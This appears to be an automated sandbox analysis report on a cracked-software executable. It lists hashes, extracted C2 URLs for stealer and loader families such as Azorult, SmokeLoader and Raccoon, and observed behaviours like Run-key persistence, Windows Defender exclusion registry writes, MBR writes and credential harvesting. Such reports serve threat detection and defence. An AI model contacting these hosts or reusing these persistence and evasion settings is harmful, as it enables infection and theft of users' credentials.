Analysis
-
max time kernel
393s -
max time network
1099s -
platform
windows10_x64 -
resource
win10v20201028 -
submitted
05-03-2021 05:11
Static task
static1
Behavioral task
behavioral1
Sample
Snap.Grabber.2.5.crack.by.aaocg.exe
Resource
win10v20201028
Behavioral task
behavioral2
Sample
Snap.Grabber.2.5.crack.by.aaocg.exe
Resource
win10v20201028
Behavioral task
behavioral3
Sample
Snap.Grabber.2.5.crack.by.aaocg.exe
Resource
win10v20201028
Behavioral task
behavioral4
Sample
Snap.Grabber.2.5.crack.by.aaocg.exe
Resource
win10v20201028
Behavioral task
behavioral5
Sample
Snap.Grabber.2.5.crack.by.aaocg.exe
Resource
win7v20201028
Errors
General
-
Target
Snap.Grabber.2.5.crack.by.aaocg.exe
-
Size
8.6MB
-
MD5
4c5d5630a17759bff9cb25a75a6de902
-
SHA1
7e30a081298ef34a5f7db00607f10c72464e4c96
-
SHA256
45411d2b5bf4e2d0e75af577252aba0a84ccc51e7b05e9b67a54390bb7aab8d8
-
SHA512
09d2a7fa28f88dd5c622b99318a7d68b1c3f9f6fa3edbe589cb067478dba73e790346b967599dde0745e8afeded0096c99d796206f691c34c903c97a01db80f3
Malware Config
Extracted
http://labsclub.com/welcome
Extracted
azorult
http://kvaka.li/1210776429.php
Extracted
metasploit
windows/single_exec
Extracted
raccoon
51c194bfb6e404af0e5ff0b93b443907a6a845b1
-
url4cnc
https://telete.in/h_focus_1
Extracted
smokeloader
2020
http://naritouzina.net/
http://nukaraguasleep.net/
http://notfortuaj.net/
http://natuturalistic.net/
http://zaniolofusa.net/
http://4zavr.com/upload/
http://zynds.com/upload/
http://atvua.com/upload/
http://detse.net/upload/
http://dsdett.com/upload/
http://dtabasee.com/upload/
http://yeronogles.monster/upload/
Extracted
smokeloader
2019
http://10022020newfolder1002002131-service1002.space/
http://10022020newfolder1002002231-service1002.space/
http://10022020newfolder3100231-service1002.space/
http://10022020newfolder1002002431-service1002.space/
http://10022020newfolder1002002531-service1002.space/
http://10022020newfolder33417-01242510022020.space/
http://10022020test125831-service1002012510022020.space/
http://10022020test136831-service1002012510022020.space/
http://10022020test147831-service1002012510022020.space/
http://10022020test146831-service1002012510022020.space/
http://10022020test134831-service1002012510022020.space/
http://10022020est213531-service100201242510022020.ru/
http://10022020yes1t3481-service1002012510022020.ru/
http://10022020test13561-service1002012510022020.su/
http://10022020test14781-service1002012510022020.info/
http://10022020test13461-service1002012510022020.net/
http://10022020test15671-service1002012510022020.tech/
http://10022020test12671-service1002012510022020.online/
http://10022020utest1341-service1002012510022020.ru/
http://10022020uest71-service100201dom2510022020.ru/
http://10022020test61-service1002012510022020.website/
http://10022020test51-service1002012510022020.xyz/
http://10022020test41-service100201pro2510022020.ru/
http://10022020yest31-service100201rus2510022020.ru/
http://10022020rest21-service1002012510022020.eu/
http://10022020test11-service1002012510022020.press/
http://10022020newfolder4561-service1002012510022020.ru/
http://10022020rustest213-service1002012510022020.ru/
http://10022020test281-service1002012510022020.ru/
http://10022020test261-service1002012510022020.space/
http://10022020yomtest251-service1002012510022020.ru/
http://10022020yirtest231-service1002012510022020.ru/
Extracted
raccoon
afefd33a49c7cbd55d417545269920f24c85aa37
-
url4cnc
https://telete.in/jagressor_kz
Signatures
-
Azorult
An information stealer that was first discovered in 2016, targeting browsing history and passwords.
-
ElysiumStealer
ElysiumStealer (previously known as ZeromaxStealer) is an info stealer that can steal login credentials for various accounts.
-
ElysiumStealer Payload 3 IoCs
Processes:
resource yara_rule behavioral4/files/0x000200000001abba-175.dat elysiumstealer behavioral4/files/0x000200000001abba-177.dat elysiumstealer behavioral4/memory/2720-188-0x00000000020E0000-0x00000000020E6000-memory.dmp elysiumstealer -
Glupteba Payload 6 IoCs
Processes:
resource yara_rule behavioral4/memory/4732-250-0x00000000014A0000-0x0000000001CFD000-memory.dmp family_glupteba behavioral4/memory/4732-251-0x0000000000400000-0x0000000000C77000-memory.dmp family_glupteba behavioral4/memory/4732-296-0x0000000000400000-0x0000000000C77000-memory.dmp family_glupteba behavioral4/memory/1996-2055-0x0000000000400000-0x0000000000C1B000-memory.dmp family_glupteba behavioral4/memory/1996-2056-0x0000000001310000-0x0000000001B12000-memory.dmp family_glupteba behavioral4/memory/1996-2057-0x0000000000400000-0x0000000000C1B000-memory.dmp family_glupteba -
MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 3 IoCs
Processes:
resource yara_rule behavioral4/memory/5496-411-0x0000000000400000-0x0000000000428000-memory.dmp family_redline behavioral4/memory/8400-2036-0x00000000049F0000-0x0000000004A1E000-memory.dmp family_redline behavioral4/memory/8400-2040-0x0000000004BD0000-0x0000000004BFC000-memory.dmp family_redline -
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Suspicious use of NtCreateProcessExOtherParentProcess 1 IoCs
Processes:
WerFault.exedescription pid Process procid_target PID 1048 created 4752 1048 WerFault.exe 152 -
Suspicious use of NtCreateUserProcessOtherParentProcess 5 IoCs
Processes:
svchost.exedescription pid Process procid_target PID 4984 created 4732 4984 svchost.exe 144 PID 4984 created 1360 4984 svchost.exe 234 PID 4984 created 1360 4984 svchost.exe 234 PID 4984 created 1360 4984 svchost.exe 234 PID 4984 created 1360 4984 svchost.exe 234 -
Checks for common network interception software 1 TTPs
Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.
-
Modifies boot configuration data using bcdedit 15 IoCs
Processes:
bcdedit.exebcdedit.exebcdedit.exebcdedit.exebcdedit.exebcdedit.exebcdedit.exebcdedit.exebcdedit.exebcdedit.exebcdedit.exebcdedit.exebcdedit.exebcdedit.exebcdedit.exepid Process 5096 bcdedit.exe 5776 bcdedit.exe 5440 bcdedit.exe 5220 bcdedit.exe 5060 bcdedit.exe 2156 bcdedit.exe 4900 bcdedit.exe 3412 bcdedit.exe 4516 bcdedit.exe 4620 bcdedit.exe 4916 bcdedit.exe 2228 bcdedit.exe 4444 bcdedit.exe 4308 bcdedit.exe 5676 bcdedit.exe -
Nirsoft 4 IoCs
Processes:
resource yara_rule behavioral4/files/0x000100000001ab8d-124.dat Nirsoft behavioral4/files/0x000100000001ab8d-125.dat Nirsoft behavioral4/files/0x000100000001abba-149.dat Nirsoft behavioral4/files/0x000100000001abba-148.dat Nirsoft -
XMRig Miner Payload 5 IoCs
Processes:
resource yara_rule behavioral4/memory/6416-1550-0x0000000140000000-0x000000014072E000-memory.dmp xmrig behavioral4/memory/6416-1552-0x0000000140000000-0x000000014072E000-memory.dmp xmrig behavioral4/memory/6416-1553-0x0000000140000000-0x000000014072E000-memory.dmp xmrig behavioral4/memory/8100-1938-0x0000000140000000-0x000000014072E000-memory.dmp xmrig behavioral4/memory/8100-1940-0x0000000140000000-0x000000014072E000-memory.dmp xmrig -
Blocklisted process makes network request 2 IoCs
Processes:
powershell.exeflow pid Process 189 4264 powershell.exe 189 4264 powershell.exe -
Drops file in Drivers directory 5 IoCs
Processes:
DrvInst.exedsefix.execsrss.exedescription ioc Process File opened for modification C:\Windows\System32\drivers\SETF048.tmp DrvInst.exe File created C:\Windows\System32\drivers\SETF048.tmp DrvInst.exe File opened for modification C:\Windows\System32\drivers\tap0901.sys DrvInst.exe File created C:\Windows\system32\drivers\VBoxDrv.sys dsefix.exe File created C:\Windows\System32\drivers\Winmon.sys csrss.exe -
Executes dropped EXE 64 IoCs
Processes:
keygen-pr.exekeygen-step-1.exekeygen-step-3.exekeygen-step-4.exekey.exefile.exekey.exe3E52.tmp.exe3E52.tmp.exeSetup.exeC0CA61A12E4C8B38.exeC0CA61A12E4C8B38.exeInstall.exemultitimer.exeaskinstall20.exe1614921505116.exemd2_2efs.exeConhost.exemultitimer.exe1614921510178.exe6319048.694249737.468231898.90gcttt.exejfiag3g_gg.exeWindows Host.exe1614921515929.exevuc5xpml40m.exejfiag3g_gg.exevuc5xpml40m.tmpaskinstall24.exesafebits.exeapp.exesvchost.exeocd50upzkg2.exevict.exe3zfg0vwkmou.exechashepro3.exeSetup3310.exeIBInstaller_97039.exechashepro3.tmpSetup3310.tmpvpn.exeIBInstaller_97039.tmpvict.tmpwinlthst.exevpn.tmp5.exeAbbas.exeVenita.exewhiterauf.exewimapi.exechrome_proxy.exeg11uqjimrim.exeg11uqjimrim.tmpSetup.exeThunderFW.exeSetup.tmpL7U58PP2F.exetapinstall.exeMiniThunderPlatform.exetapinstall.exeVenita.exepid Process 952 keygen-pr.exe 2296 keygen-step-1.exe 1412 keygen-step-3.exe 4032 keygen-step-4.exe 1320 key.exe 1860 file.exe 1124 key.exe 2324 3E52.tmp.exe 1656 3E52.tmp.exe 3948 Setup.exe 3024 C0CA61A12E4C8B38.exe 2840 C0CA61A12E4C8B38.exe 684 Install.exe 936 multitimer.exe 3188 askinstall20.exe 1232 1614921505116.exe 2116 md2_2efs.exe 212 Conhost.exe 3912 multitimer.exe 1928 1614921510178.exe 212 Conhost.exe 4044 6319048.69 3928 4249737.46 2720 8231898.90 488 gcttt.exe 2736 jfiag3g_gg.exe 2788 Windows Host.exe 4332 1614921515929.exe 4456 vuc5xpml40m.exe 4472 jfiag3g_gg.exe 4508 vuc5xpml40m.tmp 4552 askinstall24.exe 4568 safebits.exe 4732 app.exe 4724 svchost.exe 4752 ocd50upzkg2.exe 4764 vict.exe 4776 3zfg0vwkmou.exe 4788 chashepro3.exe 4712 Setup3310.exe 4812 IBInstaller_97039.exe 4956 chashepro3.tmp 4992 Setup3310.tmp 5004 vpn.exe 5048 IBInstaller_97039.tmp 5024 vict.tmp 4108 winlthst.exe 1868 vpn.tmp 1568 5.exe 3176 Abbas.exe 4284 Venita.exe 4272 whiterauf.exe 1244 wimapi.exe 4396 chrome_proxy.exe 5168 g11uqjimrim.exe 5268 g11uqjimrim.tmp 5360 Setup.exe 5400 ThunderFW.exe 5424 Setup.tmp 5652 L7U58PP2F.exe 4700 tapinstall.exe 5116 MiniThunderPlatform.exe 5972 tapinstall.exe 5488 Venita.exe -
Modifies Windows Firewall 1 TTPs
-
Possible attempt to disable PatchGuard 2 TTPs
Rootkits can use kernel patching to embed themselves in an operating system.
-
Processes:
resource yara_rule behavioral4/files/0x000200000001ab74-65.dat office_xlm_macros -
Processes:
resource yara_rule behavioral4/memory/696-477-0x0000000000400000-0x0000000000897000-memory.dmp upx -
Checks computer location settings 2 TTPs 4 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
L7U58PP2F.execmd.execmd.exeg11uqjimrim.tmpdescription ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Control Panel\International\Geo\Nation L7U58PP2F.exe Key value queried \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Control Panel\International\Geo\Nation cmd.exe Key value queried \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Control Panel\International\Geo\Nation cmd.exe Key value queried \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Control Panel\International\Geo\Nation g11uqjimrim.tmp -
Loads dropped DLL 50 IoCs
Processes:
MsiExec.exe8231898.90vuc5xpml40m.tmpSetup3310.tmpIBInstaller_97039.tmpvict.tmpvpn.tmpg11uqjimrim.tmpSetup.tmpC0CA61A12E4C8B38.exeMiniThunderPlatform.exe5.exevisCsLiTc.exei05BjXfG5.exepatch.exemask_svc.exeMaskVPNUpdate.exepid Process 3480 MsiExec.exe 2720 8231898.90 4508 vuc5xpml40m.tmp 4992 Setup3310.tmp 4992 Setup3310.tmp 5048 IBInstaller_97039.tmp 5024 vict.tmp 1868 vpn.tmp 1868 vpn.tmp 1868 vpn.tmp 1868 vpn.tmp 1868 vpn.tmp 1868 vpn.tmp 1868 vpn.tmp 1868 vpn.tmp 5268 g11uqjimrim.tmp 5268 g11uqjimrim.tmp 5268 g11uqjimrim.tmp 5268 g11uqjimrim.tmp 5268 g11uqjimrim.tmp 5424 Setup.tmp 5424 Setup.tmp 3024 C0CA61A12E4C8B38.exe 3024 C0CA61A12E4C8B38.exe 5116 MiniThunderPlatform.exe 5116 MiniThunderPlatform.exe 5116 MiniThunderPlatform.exe 5116 MiniThunderPlatform.exe 5116 MiniThunderPlatform.exe 5116 MiniThunderPlatform.exe 5116 MiniThunderPlatform.exe 1568 5.exe 4580 visCsLiTc.exe 4580 visCsLiTc.exe 5812 i05BjXfG5.exe 5812 i05BjXfG5.exe 4976 patch.exe 4976 patch.exe 4976 patch.exe 5552 mask_svc.exe 5552 mask_svc.exe 5552 mask_svc.exe 5552 mask_svc.exe 5552 mask_svc.exe 5552 mask_svc.exe 4976 patch.exe 1868 vpn.tmp 1868 vpn.tmp 5768 MaskVPNUpdate.exe 5768 MaskVPNUpdate.exe -
Modifies file permissions 1 TTPs 1 IoCs
-
Obfuscated with Agile.Net obfuscator 1 IoCs
Detects use of the Agile.Net commercial obfuscator, which is capable of entity renaming and control flow obfuscation.
Processes:
resource yara_rule behavioral4/memory/9312-2238-0x0000000005F00000-0x0000000005F21000-memory.dmp agile_net -
Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
-
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Processes:
app.exedescription ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows = "0" app.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\rss = "0" app.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\csrss.exe = "0" app.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\windefender.exe = "0" app.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\csrss = "0" app.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Roaming\NamelessBird = "0" app.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\windefender.exe = "0" app.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\wup = "0" app.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\System32\drivers = "0" app.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\app.exe = "0" app.exe -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 6 IoCs
Processes:
Conhost.exegcttt.exe4249737.46g11uqjimrim.tmpL7U58PP2F.exeapp.exedescription ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\noqvekcgkr5 = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\ORRP470L9S\\multitimer.exe\" 1 3.1614921295.6041be4f67c09" Conhost.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\haleng = "C:\\Users\\Admin\\AppData\\Local\\Temp\\haleng.exe" gcttt.exe Set value (str) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Windows\CurrentVersion\Run\Windows Host = "C:\\ProgramData\\Windows Host\\Windows Host.exe" 4249737.46 Set value (str) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Windows\CurrentVersion\Run\5065306 = "\"C:\\Users\\Admin\\AppData\\Roaming\\ynhhxmexuws\\g11uqjimrim.exe\" /VERYSILENT" g11uqjimrim.tmp Set value (str) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Windows\CurrentVersion\Run\E686HPHPSUVMU3R = "\"C:\\Program Files\\L7U58PP2FM\\L7U58PP2F.exe\"" L7U58PP2F.exe Set value (str) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Windows\CurrentVersion\Run\NamelessBird = "\"C:\\Windows\\rss\\csrss.exe\"" app.exe -
Checks for any installed AV software in registry 1 TTPs 53 IoCs
Processes:
multitimer.exedescription ioc Process Key opened \REGISTRY\MACHINE\SOFTWARE\AVG\AV multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\McAfee\DesktopProtection multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\ClamWin\Version multitimer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\AntiVirService multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\SOFTWARE\COMODO\CIS multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\COMODO\CIS multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Bitdefender\QuickScan multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\SOFTWARE\KasperskyLab multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\ESET\NOD multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\F-Secure\Computer Security\DART multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\G Data\AntiVirenKit multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\SOFTWARE\Microsoft\Microsoft Antimalware Setup\StartMenu Microsoft Security Essentials multitimer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\a2AntiMalware multitimer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\McProxy multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\AVAST Software\Avast multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\SOFTWARE\ESET\NOD multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\SOFTWARE\Doctor Web\InstalledComponents multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\AVG\AV multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\BullGuard Ltd.\BullGuard\Main multitimer.exe Key opened \REGISTRY\MACHINE\Software\Avira\Antivirus multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\TrendMicro\UniClient multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\SOFTWARE\ClamWin\Version multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\ClamWin\Version multitimer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\QHActiveDefense multitimer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\DrWebAVService multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\SOFTWARE\AVAST Software\Avast multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\Microsoft Antimalware Setup\StartMenu Microsoft Security Essentials multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Vba32\Loader multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\F-Secure\Computer Security\DART multitimer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet\Services\MBAMProtector multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\IKARUS\anti.virus multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Doctor Web\InstalledComponents multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\SOFTWARE\AVG\AV multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\FRISK Software\F-PROT Antivirus for Windows multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\SOFTWARE\F-Secure\Computer Security\DART multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\AhnLab\V3IS80 multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\ArcaBit multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\COMODO\CIS multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Fortinet\FortiClient\installed multitimer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\AVP18.0.0 multitimer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\BavSvc multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\AVAST Software\Avast multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\ESET\NOD multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Sophos multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Microsoft Antimalware Setup\StartMenu Microsoft Security Essentials multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\K7 Computing\K7TotalSecurity multitimer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\McAPExe multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Doctor Web\InstalledComponents multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Avira\Antivirus multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\SOFTWARE\AhnLab\V3IS80 multitimer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\avast! Antivirus multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\AhnLab\V3IS80 multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Jiangmin\ComputerID multitimer.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Processes:
md2_2efs.exedescription ioc Process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA md2_2efs.exe -
Enumerates connected drives 3 TTPs 48 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
Processes:
msiexec.exemsiexec.exedescription ioc Process File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\Y: msiexec.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\Z: msiexec.exe File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\Y: msiexec.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\F: msiexec.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\W: msiexec.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\W: msiexec.exe File opened (read-only) \??\Z: msiexec.exe File opened (read-only) \??\F: msiexec.exe File opened (read-only) \??\U: msiexec.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 19 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 2047 ipinfo.io 2049 ipinfo.io 91 ip-api.com 1101 ipinfo.io 1483 ipinfo.io 1905 api.2ip.ua 954 ipinfo.io 997 ipinfo.io 1493 ipinfo.io 1906 api.2ip.ua 1952 api.2ip.ua 2120 ipinfo.io 46 api.ipify.org 134 ipinfo.io 2151 ipinfo.io 1359 ipinfo.io 1396 ipinfo.io 131 ipinfo.io 1091 ipinfo.io -
Maps connected drives based on registry 3 TTPs 2 IoCs
Disk information is often read in order to detect sandboxing environments.
Processes:
multitimer.exedescription ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum multitimer.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum\0 multitimer.exe -
Writes to the Master Boot Record (MBR) 1 TTPs 4 IoCs
Bootkits write to the MBR to gain persistence at a level below the operating system.
Processes:
MiniThunderPlatform.exeSetup.exeC0CA61A12E4C8B38.exeC0CA61A12E4C8B38.exedescription ioc Process File opened for modification \??\PhysicalDrive0 MiniThunderPlatform.exe File opened for modification \??\PhysicalDrive0 Setup.exe File opened for modification \??\PhysicalDrive0 C0CA61A12E4C8B38.exe File opened for modification \??\PhysicalDrive0 C0CA61A12E4C8B38.exe -
Drops file in System32 directory 18 IoCs
Processes:
cmd.exepowershell.exetapinstall.exeDrvInst.exedescription ioc Process File opened for modification C:\Windows\System32\DriverStore\Temp\{6203c404-5b36-4542-b3dc-e70ab92c1d31}\oemvista.inf cmd.exe File opened for modification C:\Windows\System32\DriverStore\FileRepository\oemvista.inf_amd64_a572b7f20c402d28\tap0901.sys cmd.exe File opened for modification C:\Windows\System32\DriverStore\FileRepository\oemvista.inf_amd64_a572b7f20c402d28\tap0901.cat cmd.exe File opened for modification C:\Windows\SysWOW64\%AppData%\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\System32\DriverStore\Temp\{6203c404-5b36-4542-b3dc-e70ab92c1d31}\SETEDC8.tmp cmd.exe File opened for modification C:\Windows\System32\DriverStore\Temp\{6203c404-5b36-4542-b3dc-e70ab92c1d31}\tap0901.sys cmd.exe File created C:\Windows\System32\DriverStore\drvstore.tmp cmd.exe File created C:\Windows\System32\DriverStore\Temp\{6203c404-5b36-4542-b3dc-e70ab92c1d31}\SETEDC9.tmp cmd.exe File opened for modification C:\Windows\System32\DriverStore\FileRepository\oemvista.inf_amd64_a572b7f20c402d28\oemvista.inf cmd.exe File opened for modification C:\Windows\System32\DriverStore\Temp\{6203c404-5b36-4542-b3dc-e70ab92c1d31} cmd.exe File created C:\Windows\System32\DriverStore\FileRepository\oemvista.inf_amd64_a572b7f20c402d28\oemvista.PNF tapinstall.exe File created C:\Windows\System32\DriverStore\Temp\{6203c404-5b36-4542-b3dc-e70ab92c1d31}\SETEDA8.tmp cmd.exe File created C:\Windows\System32\DriverStore\Temp\{6203c404-5b36-4542-b3dc-e70ab92c1d31}\SETEDC8.tmp cmd.exe File opened for modification C:\Windows\System32\DriverStore\Temp\{6203c404-5b36-4542-b3dc-e70ab92c1d31}\tap0901.cat cmd.exe File opened for modification C:\Windows\System32\DriverStore\Temp\{6203c404-5b36-4542-b3dc-e70ab92c1d31}\SETEDC9.tmp cmd.exe File created C:\Windows\System32\DriverStore\FileRepository\oemvista.inf_amd64_a572b7f20c402d28\oemvista.PNF DrvInst.exe File opened for modification C:\Windows\System32\DriverStore\Temp\{6203c404-5b36-4542-b3dc-e70ab92c1d31}\SETEDA8.tmp cmd.exe File opened for modification C:\Windows\System32\CatRoot2\dberr.txt cmd.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 4 IoCs
Processes:
Setup.exemask_svc.exemask_svc.exemask_svc.exepid Process 3948 Setup.exe 4468 mask_svc.exe 5912 mask_svc.exe 5552 mask_svc.exe -
Suspicious use of SetThreadContext 7 IoCs
Processes:
key.exe3E52.tmp.exeC0CA61A12E4C8B38.exeVenita.exewhiterauf.exedescription pid Process procid_target PID 1320 set thread context of 1124 1320 key.exe 89 PID 2324 set thread context of 1656 2324 3E52.tmp.exe 95 PID 3024 set thread context of 2752 3024 C0CA61A12E4C8B38.exe 116 PID 3024 set thread context of 812 3024 C0CA61A12E4C8B38.exe 127 PID 3024 set thread context of 4300 3024 C0CA61A12E4C8B38.exe 166 PID 4284 set thread context of 5496 4284 Venita.exe 212 PID 4272 set thread context of 1856 4272 whiterauf.exe 218 -
Drops file in Program Files directory 64 IoCs
Processes:
